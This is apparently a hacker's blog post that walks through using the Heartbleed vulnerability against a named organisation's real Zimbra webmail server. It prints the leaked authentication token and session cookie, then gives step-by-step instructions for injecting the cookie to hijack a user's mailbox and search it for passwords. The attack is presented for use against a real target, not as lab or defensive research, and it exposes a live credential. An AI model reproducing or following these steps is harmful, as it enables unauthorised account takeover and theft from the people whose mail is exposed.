Well this is an old vulnerablity called
Heartbleed (CVE-2014-0160). Let's exploit this.
Run the
Heartbleed exploit and you'll get the Zimbra cookie.
See the Referer and Cookie? Use that to login.
Referer: https://mx.tempo.co.id/
Cookie: ZM_TEST=true; ZM_AUTH_TOKEN=0_73ec70e72712cb16eaee148d405d1b8297c411f2_69643d33363a66356438353363632d633032372d343032302d383566322d3635636436366531623932313b6578703d31333a313438373232343637313230353b747970653d363a7a696d6272613b; JSESSIONID=1xv343h6xss51a0uhvn29oe6x
Open the Referer site in firefox who have installed Cookie Injector plugin
https://mx.tempo.co.id/ and press
alt+c to show the Cookie Injector.
You'll see "
Wireshark Cookie Dump" there. Now paste the Cookie and click OK. You should have popup screen "
All Cookie Have Been Written".
Refresh (F5) the site again and you are now login to user email.
Type password on search box and hit enter... :p
./NoGe
Comments